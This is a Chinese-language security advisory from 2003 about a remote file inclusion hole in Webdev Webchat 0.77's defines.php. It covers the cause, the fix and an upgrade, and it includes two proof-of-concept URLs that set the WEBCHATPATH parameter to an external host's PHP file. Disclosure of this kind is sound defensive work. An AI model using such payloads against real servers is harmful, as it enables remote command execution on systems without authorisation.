Webchat defines.php远程文件包含漏洞发布时间:2003-03-26 更新时间:2003-03-26 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:7000 受影响系统 Webdev Webchat 0.77详细描述 Webchat是一个用PHP实现的CGI软件,它没有正确过滤用户提交的输入,可以使用远程用户可以通过指定某些URI参数来影响某些包含文件的路径,使指向系统外的文件。远程攻击者可以使Webchat的CGI脚本包含一个其控制的外部主机上的文件使目标服务器以Web进程的权限执行任意命令。 测试代码 http://www.example.com/defines.php?WEBCHATPATH=http://www.target.com/db_mysql.php http://www.example.com/defines.php?WEBCHATPATH=http://www.target.com/language/english.php 解决方案 临时解决方案是修改PHP的配置文件php.ini,关闭'allow_url_fopen'和'register_globals'选项中的任意一个。 厂商已经在新版的软件中修补了此漏洞: Webdev Webchat 0.77: Webdev Upgrade Webchat 0.78 http://www.webdev.ro/products/webchat/download.php 相关信息 "Frog Man" <leseulfrog@hotmail.com> WebChat (PHP) http://archives.neohapsis.com/archives/bugtraq/2003-03/0037.html |
